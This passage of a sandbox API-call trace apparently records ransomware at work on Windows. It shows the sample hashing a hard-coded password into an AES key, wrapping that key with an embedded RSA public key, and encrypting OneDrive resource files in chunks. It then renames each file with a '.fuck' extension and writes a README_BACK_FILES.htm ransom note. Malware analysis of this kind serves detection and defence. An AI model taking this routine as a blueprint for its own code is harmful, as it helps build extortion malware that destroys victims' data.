pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.803] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2c0, lpOverlapped=0x0) returned 1 [0270.803] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2c0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0) returned 1 [0270.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0270.804] CloseHandle (hObject=0x5d48) returned 1 [0270.804] CloseHandle (hObject=0x5d4c) returned 1 [0270.804] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0270.808] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0270.809] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0270.810] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0270.812] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0270.812] CryptDestroyKey (hKey=0x2fa748) returned 1 [0270.812] CryptReleaseContext (hProv=0x2f26b38, dwFlags=0x0) returned 1 [0270.812] FindNextFileA (in: hFindFile=0x2fa608, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0270.812] FindClose (in: hFindFile=0x2fa608 | out: hFindFile=0x2fa608) returned 1 [0270.812] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\readme_back_files.htm")) returned 0xffffffff [0270.812] AreFileApisANSI () returned 1 [0270.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28895b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0270.812] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\is\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0270.813] GetFileType (hFile=0x5d3c) returned 0x1 [0270.814] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0270.815] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.815] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa948 [0270.817] FindNextFileA (in: hFindFile=0x2fa948, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0270.817] FindNextFileA (in: hFindFile=0x2fa948, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0270.818] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0270.818] GetLastError () returned 0x0 [0270.818] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\filesync.localizedresources.dll.mui")) returned 0x20 [0270.818] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0270.819] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0270.820] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0270.822] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0270.823] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f26e68) returned 1 [0270.827] CryptCreateHash (in: hProv=0x2f26e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0270.827] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0270.827] CryptHashData (hHash=0x2fa1c8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0270.827] CryptDeriveKey (in: hProv=0x2f26e68, Algid=0x6610, hBaseData=0x2fa1c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa208) returned 1 [0270.827] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0270.827] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0270.827] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f272a8) returned 1 [0270.828] CryptImportPublicKeyInfo (in: hCryptProv=0x2f272a8, dwCertEncodingType=0x1, pInfo=0x2f32500*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32530*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32538*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fa288) returned 1 [0270.828] CryptEncrypt (in: hKey=0x2fa288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0270.828] CryptEncrypt (in: hKey=0x2fa288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26ab0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f26ab0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0270.828] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f26ab0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f26ab0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0270.829] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.832] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.832] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.838] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.839] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.839] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.839] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.839] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.839] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.839] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.839] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.839] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.839] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.839] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.839] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.839] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.839] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.840] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.840] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.840] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.840] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.840] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.840] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.840] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.840] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.840] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.840] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.840] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.840] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.840] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.841] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.841] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.841] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.841] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.841] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.841] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.841] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.841] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.841] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.841] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.841] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.841] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.841] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.841] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.842] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.842] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.842] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.842] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.842] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.842] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.842] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.842] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.842] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.842] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.842] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.842] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.842] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.843] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.843] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.843] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.843] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.843] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.843] WriteFile (in: hFile=0x5d48, 